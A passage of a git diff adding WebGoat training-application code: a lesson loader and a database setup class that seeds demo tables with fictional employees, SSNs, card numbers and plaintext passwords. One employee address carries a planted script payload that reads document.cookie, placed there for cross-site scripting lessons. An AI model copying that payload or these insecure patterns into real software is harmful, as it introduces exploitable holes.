+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Course.java b/main/project/JavaSource/org/owasp/webgoat/session/Course.java
new file mode 100644
index 000000000..efbc9dc33
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/Course.java
@@ -0,0 +1,443 @@
+package org.owasp.webgoat.session;
+
+import java.io.File;
+import java.io.IOException;
+import java.util.ArrayList;
+import java.util.Collections;
+import java.util.Iterator;
+import java.util.List;
+import java.util.Set;
+import java.util.Vector;
+import java.util.LinkedList;
+
+import javax.servlet.ServletContext;
+
+import org.owasp.webgoat.HammerHead;
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.lessons.Category;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+public class Course
+{
+
+    private List<AbstractLesson> lessons = new LinkedList<AbstractLesson>();
+
+    private final static String PROPERTIES_FILENAME = HammerHead.propertiesPath;
+
+    private WebgoatProperties properties = null;
+    
+    private List<String> files = new LinkedList<String>();
+
+    private WebgoatContext webgoatContext;
+
+    public Course()
+    {
+		try
+		{
+		    properties = new WebgoatProperties(PROPERTIES_FILENAME);
+		}
+		catch (IOException e)
+		{
+		    System.out.println("Error loading WebGoat properties");
+		    e.printStackTrace();
+		}
+    }
+    
+    /**
+     * Take an absolute file and return the filename.
+     * 
+     * Ex. /etc/password becomes password
+     * 
+     * @param s
+     * @return the file name
+     */
+    private static String getFileName(String s)
+    {
+    	String fileName = new File(s).getName();
+		
+		if(fileName.indexOf("/") != -1)
+		{
+			fileName = fileName.substring(fileName.lastIndexOf("/"), fileName.length());
+		}
+		
+		if(fileName.indexOf(".") != -1)
+		{
+			fileName = fileName.substring(0, fileName.indexOf("."));
+		}
+		
+		return fileName;
+    }
+    
+    /**
+     * Take a class name and return the equivalent file name
+     * 
+     * Ex. org.owasp.webgoat becomes org/owasp/webgoat.java
+     * 
+     * @param className
+     * @return
+     */
+    private static String getSourceFile(String className)
+    {
+    	StringBuffer sb = new StringBuffer();
+    	
+    	sb.append(className.replace(".", "/"));
+    	sb.append(".java");
+    	
+    	return sb.toString();
+    }
+
+
+    /**
+     *  Takes a file name and builds the class file name
+     *
+     * @param  fileName  Description of the Parameter
+     * @param  path      Description of the Parameter
+     * @return           Description of the Return Value
+     */
+    private static String getClassFile(String fileName, String path)
+    {
+    	String ext = ".class";
+		fileName = fileName.trim();
+		
+		/**
+		 * We do not handle directories.
+		 * We do not handle files with different extensions
+		 */
+		if(fileName.endsWith("/") || !fileName.endsWith(ext))
+		{
+			return null;
+		}
+	
+		// if the file is in /WEB-INF/classes strip the dir info off
+		int index = fileName.indexOf("/WEB-INF/classes/");
+		if (index != -1)
+		{
+		    fileName = fileName.substring(index + "/WEB-INF/classes/".length(), fileName.length() - ext.length());
+		    fileName = fileName.replace('/', '.');
+		    fileName = fileName.replace('\\', '.');
+		}
+		else
+		{
+		    // Strip off the leading path info
+		    fileName = fileName.substring(path.length(), fileName.length() - ext.length());
+		}
+	
+		return fileName;
+    }
+
+    /**
+     *  Gets the categories attribute of the Course object
+     *
+     * @return    The categories value
+     */
+    public List getCategories()
+    {
+	List<Category> categories = new ArrayList<Category>();
+	Iterator iter = lessons.iterator();
+
+	while (iter.hasNext())
+	{
+	    AbstractLesson lesson = (AbstractLesson) iter.next();
+
+	    if (!categories.contains(lesson.getCategory()))
+	    {
+		categories.add(lesson.getCategory());
+	    }
+	}
+
+	Collections.sort(categories);
+
+	return categories;
+    }
+
+
+    /**
+     *  Gets the firstLesson attribute of the Course object
+     *
+     * @return    The firstLesson value
+     */
+    public AbstractLesson getFirstLesson()
+    {
+	List<String> roles = new ArrayList<String>();
+	roles.add(AbstractLesson.USER_ROLE);
+	// Category 0 is the admin function.  We want the first real category 
+	// to be returned. This is noramally the General category and the Http Basics lesson
+	return ((AbstractLesson) getLessons((Category) getCategories().get(1),
+		roles).get(0));
+    }
+
+
+    /**
+     *  Gets the lesson attribute of the Course object
+     *
+     * @param  lessonId  Description of the Parameter
+     * @param  role      Description of the Parameter
+     * @return           The lesson value
+     */
+    public AbstractLesson getLesson(WebSession s, int lessonId, List<String> roles)
+    {
+	if (s.isHackedAdmin())
+	{
+	    roles.add(AbstractLesson.HACKED_ADMIN_ROLE);
+	}
+	//System.out.println("getLesson() with roles: " + roles);
+	Iterator<AbstractLesson> iter = lessons.iterator();
+
+	while (iter.hasNext())
+	{
+	    AbstractLesson lesson = iter.next();
+
+	    //System.out.println("getLesson() at role: " + lesson.getRole());
+	    if (lesson.getScreenId() == lessonId
+		    && roles.contains(lesson.getRole()))
+	    {
+		return lesson;
+	    }
+	}
+
+	return null;
+    }
+
+
+    public AbstractLesson getLesson(WebSession s, int lessonId, String role)
+    {
+	List<String> roles = new Vector<String>();
+	roles.add(role);
+	return getLesson(s, lessonId, roles);
+    }
+
+
+    public List getLessons(WebSession s, String role)
+    {
+	List<String> roles = new Vector<String>();
+	roles.add(role);
+	return getLessons(s, roles);
+    }
+
+
+    /**
+     *  Gets the lessons attribute of the Course object
+     *
+     * @param  role  Description of the Parameter
+     * @return       The lessons value
+     */
+    public List<AbstractLesson> getLessons(WebSession s, List<String> roles)
+    {
+	if (s.isHackedAdmin())
+	{
+	    roles.add(AbstractLesson.HACKED_ADMIN_ROLE);
+	}
+	List<AbstractLesson> lessonList = new ArrayList<AbstractLesson>();
+	Iterator categoryIter = getCategories().iterator();
+
+	while (categoryIter.hasNext())
+	{
+	    lessonList.addAll(getLessons(s, (Category) categoryIter.next(),
+		    roles));
+	}
+	return lessonList;
+    }
+
+
+    /**
+     *  Gets the lessons attribute of the Course object
+     *
+     * @param  category  Description of the Parameter
+     * @param  role      Description of the Parameter
+     * @return           The lessons value
+     */
+    private List<AbstractLesson> getLessons(Category category, List roles)
+    {
+	List<AbstractLesson> lessonList = new ArrayList<AbstractLesson>();
+
+	Iterator iter = lessons.iterator();
+	while (iter.hasNext())
+	{
+	    AbstractLesson lesson = (AbstractLesson) iter.next();
+
+	    if (lesson.getCategory().equals(category)
+		    && roles.contains(lesson.getRole()))
+	    {
+		lessonList.add(lesson);
+	    }
+	}
+
+	Collections.sort(lessonList);
+	//		System.out.println(java.util.Arrays.asList(lessonList));
+	return lessonList;
+    }
+
+
+    public List getLessons(WebSession s, Category category, String role)
+    {
+	List<String> roles = new Vector<String>();
+	roles.add(role);
+	return getLessons(s, category, roles);
+    }
+
+
+    public List<AbstractLesson> getLessons(WebSession s, Category category, List<String> roles)
+    {
+	if (s.isHackedAdmin())
+	{
+	    roles.add(AbstractLesson.HACKED_ADMIN_ROLE);
+	}
+	return getLessons(category, roles);
+    }
+    
+    /**
+     * Load all of the filenames into a temporary cache
+     * 
+     * @param context
+     * @param path
+     */
+    private void loadFiles(ServletContext context, String path)
+    {
+    	Set resourcePaths = context.getResourcePaths(path);
+    	Iterator itr = resourcePaths.iterator();
+    	
+    	while(itr.hasNext())
+    	{
+    		String file = (String)itr.next();
+    		
+    		if(file.length() != 1 && file.endsWith("/"))
+    		{
+    			loadFiles(context, file);
+    		}
+    		else
+    		{	
+    			files.add(file);
+    		}
+    	}
+    }
+    
+    /**
+     * Instantiate all the lesson objects into a cache
+     * 
+     * @param path
+     */
+    private void loadLessons(String path)
+    {
+    	Iterator itr = files.iterator();
+    	
+    	while(itr.hasNext())
+    	{
+    		String file = (String)itr.next();
+    		String className = getClassFile(file, path);
+    		
+    		if(className != null && !className.endsWith("_i"))
+    		{
+    			try
+    			{
+    				Class c = Class.forName(className);
+    				Object o = c.newInstance();
+    				
+    				if(o instanceof AbstractLesson)
+    				{
+    					AbstractLesson lesson = (AbstractLesson)o;
+    					lesson.setWebgoatContext(webgoatContext);
+    					
+    					lesson.update(properties);
+    					
+    					if(lesson.getHidden() == false)
+    					{
+    						lessons.add(lesson);
+    					}
+    				}
+    			}
+    			catch (Exception e)
+    			{
+    				//System.out.println("Warning: " + e.getMessage());
+    			}
+    		}
+    	}
+    }
+    
+    /**
+     * For each lesson, set the source file and lesson file
+     */
+    private void loadResources()
+    {
+    	Iterator lessonItr = lessons.iterator();
+    	
+    	while(lessonItr.hasNext())
+    	{
+    		AbstractLesson lesson = (AbstractLesson)lessonItr.next();
+    		String className = lesson.getClass().getName();
+    		String classFile = getSourceFile(className);
+    		
+    		Iterator fileItr = files.iterator();
+    		
+    		while(fileItr.hasNext())
+    		{
+    			String absoluteFile = (String)fileItr.next();
+    			String fileName = getFileName(absoluteFile);
+			//System.out.println("Course: looking at file:  " + absoluteFile);
+    			
+    			if(absoluteFile.endsWith(classFile))
+    			{
+    				//System.out.println("Set source file for " + classFile);
+    				lesson.setSourceFileName(absoluteFile);
+    			}
+    			
+    			if(absoluteFile.startsWith("/lesson_plans") && absoluteFile.endsWith(".html") && className.endsWith(fileName))
+    			{
+    				//System.out.println("DEBUG: setting lesson plan file " + absoluteFile + " for lesson " + lesson.getClass().getName());
+    				//System.out.println("fileName: " + fileName + " == className: " + className );
+    				lesson.setLessonPlanFileName(absoluteFile);
+    			}
+    			if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName))
+    			{
+    				//System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName());
+    				//System.out.println("fileName: " + fileName + " == className: " + className );
+    				lesson.setLessonSolutionFileName(absoluteFile);
+    			}
+    		}
+    	}
+    }
+
+    /**
+     *  Description of the Method
+     *
+     * @param  path     Description of the Parameter
+     * @param  context  Description of the Parameter
+     */
+    public void loadCourses(WebgoatContext webgoatContext, ServletContext context, String path)
+    {
+    	this.webgoatContext = webgoatContext;
+    	loadFiles(context, path);
+    	loadLessons(path);
+    	loadResources();
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java b/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java
new file mode 100644
index 000000000..c5da993f9
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java
@@ -0,0 +1,788 @@
+package org.owasp.webgoat.session;
+
+import java.sql.Connection;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.lessons.AbstractLesson;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ */
+public class CreateDB
+{
+
+    /**
+     * Description of the Method
+     *
+     * @param connection Description of the Parameter
+     *
+     * @exception SQLException Description of the Exception
+     */
+    private void createMessageTable(Connection connection) throws SQLException
+    {
+	Statement statement = connection.createStatement();
+
+	// Drop admin user table
+	try
+	{
+	    String dropTable = "DROP TABLE messages";
+	    statement.executeUpdate(dropTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error dropping message database");
+	}
+
+	// Create the new table
+	try
+	{
+	    String createTableStatement = "CREATE TABLE messages ("
+		    + "num int not null," + "title varchar(50),"
+		    + "message varchar(200),"
+		    + "user_name varchar(50) not null " + ")";
+	    statement.executeUpdate(createTableStatement);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error creating message database");
+	    e.printStackTrace();
+	}
+    }
+
+
+    /**
+     * Description of the Method
+     *
+     * @param connection Description of the Parameter
+     *
+     * @exception SQLException Description of the Exception
+     */
+    private void createProductTable(Connection connection) throws SQLException
+    {
+	Statement statement = connection.createStatement();
+
+	// Drop admin user table
+	try
+	{
+	    String dropTable = "DROP TABLE product_system_data";
+	    statement.executeUpdate(dropTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error dropping product database");
+	}
+
+	// Create the new table
+	try
+	{
+	    String createTableStatement = "CREATE TABLE product_system_data ("
+		    + "productid varchar(6) not null primary key,"
+		    + "product_name varchar(20)," + "price varchar(10)" + ")";
+	    statement.executeUpdate(createTableStatement);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error creating product database");
+	    e.printStackTrace();
+	}
+
+	// Populate
+	String insertData1 = "INSERT INTO product_system_data VALUES ('32226','Dog Bone','$1.99')";
+	String insertData2 = "INSERT INTO product_system_data VALUES ('35632','DVD Player','$214.99')";
+	String insertData3 = "INSERT INTO product_system_data VALUES ('24569','60 GB Hard Drive','$149.99')";
+	String insertData4 = "INSERT INTO product_system_data VALUES ('56970','80 GB Hard Drive','$179.99')";
+	String insertData5 = "INSERT INTO product_system_data VALUES ('14365','56 inch HDTV','$6999.99')";
+	statement.executeUpdate(insertData1);
+	statement.executeUpdate(insertData2);
+	statement.executeUpdate(insertData3);
+	statement.executeUpdate(insertData4);
+	statement.executeUpdate(insertData5);
+    }
+
+
+    /**
+     * Description of the Method
+     *
+     * @param connection Description of the Parameter
+     *
+     * @exception SQLException Description of the Exception
+     */
+    private void createUserAdminTable(Connection connection)
+	    throws SQLException
+    {
+	Statement statement = connection.createStatement();
+
+	// Drop admin user table
+	try
+	{
+	    String dropTable = "DROP TABLE user_system_data";
+	    statement.executeUpdate(dropTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error dropping user admin database");
+	}
+
+	// Create the new table
+	try
+	{
+	    String createTableStatement = "CREATE TABLE user_system_data ("
+		    + "userid varchar(5) not null primary key,"
+		    + "user_name varchar(12)," + "password varchar(10),"
+		    + "cookie varchar(30)" + ")";
+	    statement.executeUpdate(createTableStatement);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error creating user admin database");
+	    e.printStackTrace();
+	}
+
+	// Populate
+	String insertData1 = "INSERT INTO user_system_data VALUES ('101','jsnow','passwd1', '')";
+	String insertData2 = "INSERT INTO user_system_data VALUES ('102','jdoe','passwd2', '')";
+	String insertData3 = "INSERT INTO user_system_data VALUES ('103','jplane','passwd3', '')";
+	String insertData4 = "INSERT INTO user_system_data VALUES ('104','jeff','jeff', '')";
+	String insertData5 = "INSERT INTO user_system_data VALUES ('105','dave','dave', '')";
+	statement.executeUpdate(insertData1);
+	statement.executeUpdate(insertData2);
+	statement.executeUpdate(insertData3);
+	statement.executeUpdate(insertData4);
+	statement.executeUpdate(insertData5);
+    }
+
+
+    /**
+     * Description of the Method
+     *
+     * @param connection Description of the Parameter
+     *
+     * @exception SQLException Description of the Exception
+     */
+    private void createUserDataTable(Connection connection) throws SQLException
+    {
+	Statement statement = connection.createStatement();
+
+	// Delete table if there is one
+	try
+	{
+	    String dropTable = "DROP TABLE user_data";
+	    statement.executeUpdate(dropTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error dropping user database");
+	}
+
+	// Create the new table
+	try
+	{
+	    String createTableStatement = "CREATE TABLE user_data ("
+		    + "userid int not null," + "first_name varchar(20),"
+		    + "last_name varchar(20)," + "cc_number varchar(30),"
+		    + "cc_type varchar(10)," + "cookie varchar(20),"
+		    + "login_count int" + ")";
+	    statement.executeUpdate(createTableStatement);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error creating user database");
+	    e.printStackTrace();
+	}
+
+	// Populate it
+	String insertData1 = "INSERT INTO user_data VALUES (101,'Joe','Snow','987654321','VISA',' ',0)";
+	String insertData2 = "INSERT INTO user_data VALUES (101,'Joe','Snow','2234200065411','MC',' ',0)";
+	String insertData3 = "INSERT INTO user_data VALUES (102,'John','Smith','2435600002222','MC',' ',0)";
+	String insertData4 = "INSERT INTO user_data VALUES (102,'John','Smith','4352209902222','AMEX',' ',0)";
+	String insertData5 = "INSERT INTO user_data VALUES (103,'Jane','Plane','123456789','MC',' ',0)";
+	String insertData6 = "INSERT INTO user_data VALUES (103,'Jane','Plane','333498703333','AMEX',' ',0)";
+	String insertData7 = "INSERT INTO user_data VALUES (10312,'Jolly','Hershey','176896789','MC',' ',0)";
+	String insertData8 = "INSERT INTO user_data VALUES (10312,'Jolly','Hershey','333300003333','AMEX',' ',0)";
+	String insertData9 = "INSERT INTO user_data VALUES (10323,'Grumpy','White','673834489','MC',' ',0)";
+	String insertData10 = "INSERT INTO user_data VALUES (10323,'Grumpy','White','33413003333','AMEX',' ',0)";
+	String insertData11 = "INSERT INTO user_data VALUES (15603,'Peter','Sand','123609789','MC',' ',0)";
+	String insertData12 = "INSERT INTO user_data VALUES (15603,'Peter','Sand','338893453333','AMEX',' ',0)";
+	String insertData13 = "INSERT INTO user_data VALUES (15613,'Joesph','Something','33843453533','AMEX',' ',0)";
+	statement.executeUpdate(insertData1);
+	statement.executeUpdate(insertData2);
+	statement.executeUpdate(insertData3);
+	statement.executeUpdate(insertData4);
+	statement.executeUpdate(insertData5);
+	statement.executeUpdate(insertData6);
+	statement.executeUpdate(insertData7);
+	statement.executeUpdate(insertData8);
+	statement.executeUpdate(insertData9);
+	statement.executeUpdate(insertData10);
+	statement.executeUpdate(insertData11);
+	statement.executeUpdate(insertData12);
+	statement.executeUpdate(insertData13);
+    }
+
+
+    private void createLoginTable(Connection connection) throws SQLException
+    {
+	Statement statement = connection.createStatement();
+
+	// Delete table if there is one
+	try
+	{
+	    String dropTable = "DROP TABLE user_login";
+	    statement.executeUpdate(dropTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error dropping user_login table");
+	}
+
+	// Create the new table
+	try
+	{
+	    String createTableStatement = "CREATE TABLE user_login ("
+		    + "userid varchar(5)," + "webgoat_user varchar(20)" + ")";
+	    statement.executeUpdate(createTableStatement);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error creating user database");
+	    e.printStackTrace();
+	}
+
+    }
+
+
+    /**
+     * Description of the Method
+     *
+     * @param connection Description of the Parameter
+     *
+     * @exception SQLException Description of the Exception
+     */
+    private void createWeatherDataTable(Connection connection)
+	    throws SQLException
+    {
+	Statement statement = connection.createStatement();
+
+	// Delete table if there is one
+	try
+	{
+	    String dropTable = "DROP TABLE weather_data";
+	    statement.executeUpdate(dropTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error dropping weather database");
+	}
+
+	// Create the new table
+	try
+	{
+	    String createTableStatement = "CREATE TABLE weather_data ("
+		    + "station int not null," + "name varchar(20) not null,"
+		    + "state char(2) not null," + "min_temp int not null,"
+		    + "max_temp int not null" + ")";
+	    statement.executeUpdate(createTableStatement);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error creating weather database");
+	    e.printStackTrace();
+	}
+
+	// Populate it
+	String insertData1 = "INSERT INTO weather_data VALUES (101,'Columbia','MD',-10,102)";
+	String insertData2 = "INSERT INTO weather_data VALUES (102,'Seattle','WA',-15,90)";
+	String insertData3 = "INSERT INTO weather_data VALUES (103,'New York','NY',-10,110)";
+	String insertData4 = "INSERT INTO weather_data VALUES (104,'Houston','TX',20,120)";
+	String insertData5 = "INSERT INTO weather_data VALUES (10001,'Camp David','MD',-10,100)";
+	String insertData6 = "INSERT INTO weather_data VALUES (11001,'Ice Station Zebra','NA',-60,30)";
+	statement.executeUpdate(insertData1);
+	statement.executeUpdate(insertData2);
+	statement.executeUpdate(insertData3);
+	statement.executeUpdate(insertData4);
+	statement.executeUpdate(insertData5);
+	statement.executeUpdate(insertData6);
+    }
+
+
+    //--------------------------------------------------------------------------
+    //--------------------------------------------------------------------------
+    //
+    //  The tables below are for WebGoat Financials
+    //
+    //  DO NOT MODIFY THESE TABLES - unless you change the org chart
+    //								 and access control matrix documents
+    //
+    //--------------------------------------------------------------------------
+    //--------------------------------------------------------------------------
+
+    private void createEmployeeTable(Connection connection) throws SQLException
+    {
+	Statement statement = connection.createStatement();
+
+	try
+	{
+	    String dropTable = "DROP TABLE employee";
+	    statement.executeUpdate(dropTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error: unable to drop employee table");
+	}
+
+	// Create Table
+	try
+	{
+	    String createTable = "CREATE TABLE employee ("
+		    //+ "userid INT GENERATED ALWAYS AS IDENTITY PRIMARY KEY,"
+		    + "userid INT NOT NULL PRIMARY KEY,"
+		    + "first_name VARCHAR(20)," + "last_name VARCHAR(20),"
+		    + "ssn VARCHAR(12)," + "password VARCHAR(10),"
+		    + "title VARCHAR(20)," + "phone VARCHAR(13),"
+		    + "address1 VARCHAR(80)," + "address2 VARCHAR(80),"
+		    + "manager INT," + "start_date CHAR(8)," + "salary INT,"
+		    + "ccn VARCHAR(30)," + "ccn_limit INT,"
+		    + "email VARCHAR(30)," // reason for the recent write-up
+		    + "disciplined_date CHAR(8)," // date of write up, NA otherwise
+		    + "disciplined_notes VARCHAR(60)," // reason for the recent write-up
+		    + "personal_description VARCHAR(60)" // We can be rude here
+		    //+ ",CONSTRAINT fl UNIQUE NONCLUSTERED (first_name, last_name)"
+		    + ")";
+
+	    statement.executeUpdate(createTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error: unable to create employee table");
+	}
+
+	String insertData1 = "INSERT INTO employee VALUES (101, 'Larry', 'Stooge', '386-09-5451', 'larry',"
+		+ "'Technician','443-689-0192','9175 Guilford Rd','New York, NY', 102, 01012000,55000,'2578546969853547',"
+		+ "5000,'larry@stooges.com',010106,'Constantly harassing coworkers','Does not work well with others')";
+
+	String insertData2 = "INSERT INTO employee VALUES (102, 'Moe', 'Stooge', '936-18-4524','moe',"
+		+ "'CSO','443-938-5301', '3013 AMD Ave', 'New York, NY', 112, 03082003, 140000, 'NA', 0, 'moe@stooges.com', 0101013, "
+		+ "'Hit Curly over head', 'Very dominating over Larry and Curly')";
+
+	String insertData3 = "INSERT INTO employee VALUES (103, 'Curly', 'Stooge', '961-08-0047','curly',"
+		+ "'Technician','410-667-6654', '1112 Crusoe Lane', 'New York, NY', 102, 02122001, 50000, 'NA', 0, 'curly@stooges.com', 0101014, "
+		+ "'Hit Moe back', 'Owes three-thousand to company for fradulent purchases')";
+
+	String insertData4 = "INSERT INTO employee VALUES (104, 'Eric', 'Walker', '445-66-5565','eric',"
+		+ "'Engineer','410-887-1193', '1160 Prescott Rd', 'New York, NY', 107, 12152005, 13000, 'NA', 0, 'eric@modelsrus.com',0101013, "
+		+ "'Bothering Larry about webgoat problems', 'Late. Always needs help. Too intern-ish.')";
+
+	String insertData5 = "INSERT INTO employee VALUES (105, 'Tom', 'Cat', '792-14-6364','tom',"
+		+ "'Engineer','443-599-0762', '2211 HyperThread Rd.', 'New York, NY', 106, 01011999, 80000, '5481360857968521', 30000, 'tom@wb.com', 0, "
+		+ "'NA', 'Co-Owner.')";
+
+	String insertData6 = "INSERT INTO employee VALUES (106, 'Jerry', 'Mouse', '858-55-4452','jerry',"
+		+ "'Human Resources','443-699-3366', '3011 Unix Drive', 'New York, NY', 102, 01011999, 70000, '6981754825013564', 20000, 'jerry@wb.com', 0, "
+		+ "'NA', 'Co-Owner.')";
+
+	String insertData7 = "INSERT INTO employee VALUES (107, 'David', 'Giambi', '439-20-9405','david',"
+		+ "'Human Resources','610-521-8413', '5132 DIMM Avenue', 'New York, NY', 102, 05011999, 100000, '6981754825018101', 10000, 'david@modelsrus.com', 061402, "
+		+ "'Hacked into accounting server. Modified personal pay.', 'Strong work habbit. Questionable ethics.')";
+
+	String insertData8 = "INSERT INTO employee VALUES (108, 'Bruce', 'McGuirre', '707-95-9482','bruce',"
+		+ "'Engineer','610-282-1103', '8899 FreeBSD Drive<script>alert(document.cookie)</script> ', 'New York, NY', 107, 03012000, 110000, '6981754825854136', 30000, 'bruce@modelsrus.com', 061502, "
+		+ "'Tortuous Boot Camp workout at 5am. Employees felt sick.', 'Enjoys watching others struggle in exercises.')";
+
+	String insertData9 = "INSERT INTO employee VALUES (109, 'Sean', 'Livingston', '136-55-1046','sean',"
+		+ "'Engineer','610-878-9549', '6422 dFlyBSD Road', 'New York, NY', 107, 06012003, 130000, '6981754825014510', 5000, 'sean@modelsrus.com', 072804, "
+		+ "'Late to work 30 days in row due to excessive Halo 2', 'Has some fascination with Steelers. Go Ravens.')";
+
+	String insertData10 = "INSERT INTO employee VALUES (110, 'Joanne', 'McDougal', '789-54-2413','joanne',"
+		+ "'Human Resources','610-213-6341', '5567 Broadband Lane', 'New York, NY', 106, 01012001, 90000, '6981754825081054', 300, 'joanne@modelsrus.com', 112005, "
+		+ "'Used company cc to purchase new car. Limit adjusted.', 'Finds it necessary to leave early every day.')";
+
+	String insertData11 = "INSERT INTO employee VALUES (111, 'John', 'Wayne', '129-69-4572', 'john',"
+		+ "'CTO','610-213-1134', '129 Third St', 'New York, NY', 112, 01012001, 200000, '4437334565679921', 300, 'john@guns.com', 112005, "
+		+ "'', '')";
+	String insertData12 = "INSERT INTO employee VALUES (112, 'Neville', 'Bartholomew', '111-111-1111', 'socks',"
+		+ "'CEO','408-587-0024', '1 Corporate Headquarters', 'San Jose, CA', 112, 03012000, 450000, '4803389267684109', 300000, 'neville@modelsrus.com', 112005, "
+		+ "'', '')";
+
+	statement.executeUpdate(insertData1);
+	statement.executeUpdate(insertData2);
+	statement.executeUpdate(insertData3);
+	statement.executeUpdate(insertData4);
+	statement.executeUpdate(insertData5);
+	statement.executeUpdate(insertData6);
+	statement.executeUpdate(insertData7);
+	statement.executeUpdate(insertData8);
+	statement.executeUpdate(insertData9);
+	statement.executeUpdate(insertData10);
+	statement.executeUpdate(insertData11);
+	statement.executeUpdate(insertData12);
+
+    }
+
+
+    private void createRolesTable(Connection connection) throws SQLException
+    {
+	Statement statement = connection.createStatement();
+
+	try
+	{
+	    String dropTable = "DROP TABLE roles";
+	    statement.executeUpdate(dropTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error: unable to drop roles");
+	}
+
+	try
+	{
+	    String createTable = "CREATE TABLE roles ("
+		    + "userid INT NOT NULL," + "role VARCHAR(10) NOT NULL,"
+		    + "PRIMARY KEY (userid, role)" + ")";
+
+	    statement.executeUpdate(createTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error: Unable to create role table");
+	}
+
+	String insertData1 = "INSERT INTO roles VALUES (101, 'employee')";
+	String insertData2 = "INSERT INTO roles VALUES (102, 'manager')";
+	String insertData3 = "INSERT INTO roles VALUES (103, 'employee')";
+	String insertData4 = "INSERT INTO roles VALUES (104, 'employee')";
+	String insertData5 = "INSERT INTO roles VALUES (105, 'employee')";
+	String insertData6 = "INSERT INTO roles VALUES (106, 'hr')";
+	String insertData7 = "INSERT INTO roles VALUES (107, 'manager')";
+	String insertData8 = "INSERT INTO roles VALUES (108, 'employee')";
+	String insertData9 = "INSERT INTO roles VALUES (109, 'employee')";
+	String insertData10 = "INSERT INTO roles VALUES (110, 'hr')";
+	String insertData11 = "INSERT INTO roles VALUES (111, 'admin')";
+	String insertData12 = "INSERT INTO roles VALUES (112, 'admin')";
+
+	statement.executeUpdate(insertData1);
+	statement.executeUpdate(insertData2);
+	statement.executeUpdate(insertData3);
+	statement.executeUpdate(insertData4);
+	statement.executeUpdate(insertData5);
+	statement.executeUpdate(insertData6);
+	statement.executeUpdate(insertData7);
+	statement.executeUpdate(insertData8);
+	statement.executeUpdate(insertData9);
+	statement.executeUpdate(insertData10);
+	statement.executeUpdate(insertData11);
+	statement.executeUpdate(insertData12);
+    }
+
+
+    private void createAuthTable(Connection connection) throws SQLException
+    {
+	Statement statement = connection.createStatement();
+
+	try
+	{
+	    String dropTable = "DROP TABLE auth";
+	    statement.executeUpdate(dropTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error: unable to drop auth");
+	}
+
+	try
+	{
+	    String createTable = "CREATE TABLE auth ("
+		    + "role VARCHAR(10) NOT NULL,"
+		    + "functionid VARCHAR(20) NOT NULL,"
+		    + "PRIMARY KEY (role, functionid)" + ")";
+
+	    statement.executeUpdate(createTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error: unable to create auth table");
+	}
+
+	String insertData1 = "INSERT INTO auth VALUES('employee', 'Logout')";
+	String insertData2 = "INSERT INTO auth VALUES('employee', 'ListStaff')";
+	String insertData3 = "INSERT INTO auth VALUES('employee', 'ViewProfile')";
+	String insertData4 = "INSERT INTO auth VALUES('employee', 'EditProfile')";
+	String insertData4_1 = "INSERT INTO auth VALUES('employee', 'SearchStaff')";
